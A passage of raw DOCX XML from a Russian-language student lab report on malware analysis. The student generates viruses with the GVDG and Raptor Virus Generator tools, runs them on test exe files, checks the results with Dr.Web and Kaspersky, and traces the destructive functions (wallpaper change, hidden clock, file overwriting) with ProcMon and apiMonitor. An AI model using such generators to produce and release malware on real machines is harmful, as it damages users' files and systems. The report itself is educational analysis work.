        <w:t>В рез</w:t>
      </w:r>
      <w:r w:rsidR="002F575E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>ультате вирус и зараженные файлы были удалены из категории, остались лишь не имеющие назначения «мусорные» файлы (рисунок 9).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAD5C94" w14:textId="1068E13C" w:rsidR="002F575E" w:rsidRDefault="002F575E" w:rsidP="002F575E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002F575E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D2F17F8" wp14:editId="2733FC75">
            <wp:extent cx="5641383" cy="270470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134" cy="27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CA9" w14:textId="296AE519" w:rsidR="002F575E" w:rsidRDefault="002F575E" w:rsidP="002F575E">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 9. Результат излечения категории </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="002F575E">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="002F575E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E3A852" w14:textId="1B617D9A" w:rsidR="002F575E" w:rsidRDefault="005536EF" w:rsidP="002F575E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В каталог </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="005536EF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5536E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нова были добавлены копии эталонных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="005536E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айлов и сам вирус. Вирус был запущен, а после категория была проверена </w:t>
      </w:r>
      <w:r w:rsidR="00996356">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">с </w:t>
      </w:r>
      <w:r w:rsidR="00996356">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">помощью антивирусов </w:t>
      </w:r>
      <w:r w:rsidR="00996356">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dr</w:t>
      </w:r>
      <w:r w:rsidR="00996356" w:rsidRPr="00996356">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00996356">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00996356">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="005E1303">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kaspersky</w:t>
      </w:r>
      <w:r w:rsidR="00996356">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005E1303">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> в обоих случаях вирусов не было обнаружено </w:t>
      </w:r>
      <w:r w:rsidR="00996356">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>(рисунок 10</w:t>
      </w:r>
      <w:r w:rsidR="005E1303">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> и 11</w:t>
      </w:r>
      <w:r w:rsidR="00996356">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="005E1303">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E164CAA" w14:textId="05BAE31A" w:rsidR="00996356" w:rsidRDefault="00996356" w:rsidP="00996356">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00996356">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52F0A1DC" wp14:editId="666D2F42">
            <wp:extent cx="3820332" cy="209287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23" cy="20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140A" w14:textId="061C35D2" w:rsidR="00996356" w:rsidRDefault="00996356" w:rsidP="00996356">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 10. Результат проверки антивирусом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dr</w:t>
      </w:r>
      <w:r w:rsidRPr="00996356">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00996356">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03496799" w14:textId="72E3184E" w:rsidR="005E1303" w:rsidRDefault="005E1303" w:rsidP="005E1303">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005E1303">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01562C5A" wp14:editId="12FC44AB">
            <wp:extent cx="5269424" cy="195173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816" cy="19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D6B" w14:textId="3F0815C8" w:rsidR="005E1303" w:rsidRPr="00AF1D28" w:rsidRDefault="005E1303" w:rsidP="005E1303">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 11. Результат проверки антивирусом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kaspersky</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF1D28">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34386BDB" w14:textId="5B4DA061" w:rsidR="005E1303" w:rsidRDefault="005E1303" w:rsidP="005E1303">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Работа с генератором вирусов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Raptor</w:t>
      </w:r>
      <w:r w:rsidRPr="005E1303">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Virus</w:t>
      </w:r>
      <w:r w:rsidRPr="005E1303">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Generator</w:t>
      </w:r>
      <w:r w:rsidRPr="005E1303">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0E85C6" w14:textId="200B0DE4" w:rsidR="005E1303" w:rsidRDefault="00AF1D28" w:rsidP="005E1303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В каталог </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF1D28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AF1D28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AF1D28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>были скопированы</w:t>
      </w:r>
      <w:r w:rsidR="00D24928">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> те же</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> несколько произвольных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF1D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файлов </w:t>
      </w:r>
      <w:r w:rsidR="00D24928">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">что и при использовании </w:t>
      </w:r>
      <w:r w:rsidR="00D24928">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GVDG</w:t>
      </w:r>
      <w:r w:rsidR="00D24928" w:rsidRPr="00D24928">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>(рисунок 11), эталонные копии были заранее сохранены.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014926DD" w14:textId="7B0210CC" w:rsidR="00AF1D28" w:rsidRDefault="00AF1D28" w:rsidP="00AF1D28">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF1D28">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49E6581B" wp14:editId="147085CB">
            <wp:extent cx="4791075" cy="28552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28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531B" w14:textId="6BFC2117" w:rsidR="00AF1D28" w:rsidRDefault="00AF1D28" w:rsidP="00AF1D28">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 11. Содержимое каталога </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF1D28">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disk</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF1D28">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF1D28">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428E709B" w14:textId="7DB8618D" w:rsidR="00AF1D28" w:rsidRDefault="002C106B" w:rsidP="00AF1D28">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidRPr="002C106B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Raptor</w:t>
      </w:r>
      <w:r w:rsidRPr="002C106B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Virus</w:t>
      </w:r>
      <w:r w:rsidRPr="002C106B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Generator</w:t>
      </w:r>
      <w:r w:rsidRPr="002C106B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>был</w:t>
      </w:r>
      <w:r w:rsidRPr="002C106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генерирован вирус с тремя деструктивными функциями, так же выполняющий заражение всех файлов на диске </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="002C106B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>рисунок 12</w:t>
      </w:r>
      <w:r w:rsidRPr="002C106B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14:paraId="2583531D" w14:textId="5C4F19D3" w:rsidR="002C106B" w:rsidRDefault="002C106B" w:rsidP="002C106B">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002C106B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5535D3FC" wp14:editId="76E8BD3E">
            <wp:extent cx="4324350" cy="378522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38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9AB" w14:textId="3E0C3AFC" w:rsidR="002C106B" w:rsidRPr="002C106B" w:rsidRDefault="002C106B" w:rsidP="002C106B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Рисунок 12. Деструктивные функции вируса.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7711C76B" w14:textId="39B6D12F" w:rsidR="00951EEB" w:rsidRDefault="00543F95" w:rsidP="009D7762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Была запущена утилита </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ProcMon</w:t>
      </w:r>
      <w:r w:rsidRPr="00543F95">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>в ней был задан фильтр по имени «Мой Вирус».</w:t>
      </w:r>
      <w:r w:rsidR="00032426">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Вирус был запущен (рисунок 13) и в окне утилиты был зафиксирован протокол работы вируса (рисунок 14).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3583CAB9" w14:textId="4FFE0502" w:rsidR="00032426" w:rsidRDefault="00032426" w:rsidP="00032426">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00032426">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="510E3159" wp14:editId="196E4CC4">
            <wp:extent cx="5213283" cy="32581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372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062D" w14:textId="359393DE" w:rsidR="00032426" w:rsidRPr="00032426" w:rsidRDefault="00032426" w:rsidP="00032426">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 13. Результат работы вируса.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CCD1AC" w14:textId="50313537" w:rsidR="00032426" w:rsidRDefault="00032426" w:rsidP="00032426">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00032426">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39B3D06D" wp14:editId="67A8E887">
            <wp:extent cx="6300470" cy="393763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6051" w14:textId="40106B40" w:rsidR="00032426" w:rsidRDefault="00032426" w:rsidP="00032426">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 1</w:t>
      </w:r>
      <w:r w:rsidR="00435787">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>. Протокол работы вируса.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EF4898" w14:textId="42428E17" w:rsidR="000B7289" w:rsidRDefault="000B7289" w:rsidP="000B7289">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Категория </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7289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0B7289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0B7289">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>была очищена и вновь заполнена копиями</w:t>
      </w:r>
      <w:r w:rsidRPr="000B728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спользуемых ранее </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-файлов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E51D41D" w14:textId="42BAB64D" w:rsidR="000B7289" w:rsidRDefault="00422A78" w:rsidP="009C3EB6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Была запущена утилита </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>apiMonitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00422A78">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>в ней выставлены фильтры по имени процесса вируса</w:t>
      </w:r>
      <w:r w:rsidR="00E11CF6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:r w:rsidR="00E11CF6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>My</w:t>
      </w:r>
      <w:r w:rsidR="00E11CF6" w:rsidRPr="00E11CF6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00E11CF6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Virus</w:t>
      </w:r>
      <w:r w:rsidR="00E11CF6" w:rsidRPr="00E11CF6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E11CF6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidR="00E11CF6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00042302">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>. После запуска</w:t>
      </w:r>
      <w:r w:rsidR="00042302" w:rsidRPr="00042302">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00042302">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidR="00042302">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> файла, был зафиксирован протокол работы вируса (рисунок 15).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF06DF5" w14:textId="25D3DDBA" w:rsidR="00042302" w:rsidRDefault="00042302" w:rsidP="00042302">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00042302">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2359A949" wp14:editId="63267EA0">
            <wp:extent cx="6300470" cy="2851785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4BD" w14:textId="0724F8D3" w:rsidR="00042302" w:rsidRDefault="00042302" w:rsidP="00042302">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 15. Протокол работы вируса в утилите </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>apiMonitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00042302">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306A5F57" w14:textId="14F77EC7" w:rsidR="00042302" w:rsidRDefault="00665754" w:rsidP="00042302">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">На основании протоколов работы вируса, полученных с помощью утилит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ProcMon</w:t>
      </w:r>
      <w:r w:rsidRPr="0066575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/>
        </w:rPr>
        <w:t>apiMonitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00665754">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>была построена функциональная схема работы вируса, представленная в приложении 3, в которой выделены деструктивные функции вируса, на рисунках далее представлены фрагменты протоколов, отвечающих за их выполнение (рисунок 16, 17, 18</w:t>
      </w:r>
      <w:r w:rsidR="00205A56">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>,19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BFF26F" w14:textId="32E53E22" w:rsidR="00665754" w:rsidRDefault="00665754" w:rsidP="00665754">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00665754">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="187ED599" wp14:editId="5721358D">
            <wp:extent cx="5098211" cy="31115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750" cy="3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310" w14:textId="3CE0A1BB" w:rsidR="00665754" w:rsidRDefault="00665754" w:rsidP="00665754">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 16. Изменение обоев рабочего стола.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A95B47" w14:textId="25B58932" w:rsidR="00665754" w:rsidRDefault="00665754" w:rsidP="00665754">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00665754">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="405D0F37" wp14:editId="207F4EA7">
            <wp:extent cx="3752490" cy="77524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399" cy="7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2800" w14:textId="03559426" w:rsidR="00665754" w:rsidRDefault="00665754" w:rsidP="00665754">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 17. Скрытие часов с панели задач.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052139B2" w14:textId="1B1F6A68" w:rsidR="00665754" w:rsidRDefault="00665754" w:rsidP="00665754">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00665754">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7519B5B6" wp14:editId="02EFAE10">
            <wp:extent cx="5589917" cy="33205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907" cy="33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AC5" w14:textId="004380B7" w:rsidR="00665754" w:rsidRDefault="00665754" w:rsidP="00665754">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 18. Открытие файлов</w:t>
      </w:r>
      <w:r w:rsidRPr="00665754">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>«</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>My</w:t>
      </w:r>
      <w:r w:rsidRPr="00665754">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00665754">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00665754">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>APIMonitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00665754">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:t>» для перезаписи.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AD9099" w14:textId="56742B90" w:rsidR="00665754" w:rsidRDefault="00665754" w:rsidP="00665754">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00665754">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68BB47FD" wp14:editId="4D44461C">
            <wp:extent cx="4195798" cy="48394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551" cy="48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F1A" w14:textId="22A9B0B5" w:rsidR="00665754" w:rsidRDefault="00665754" w:rsidP="00665754">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 19. П</w:t>
      </w:r>
      <w:r w:rsidR="00205A56">
        <w:t>ример перезаписи файла.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ECCF37" w14:textId="60000C9F" w:rsidR="00205A56" w:rsidRDefault="00205A56" w:rsidP="00205A56">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Категория </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00205A56">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
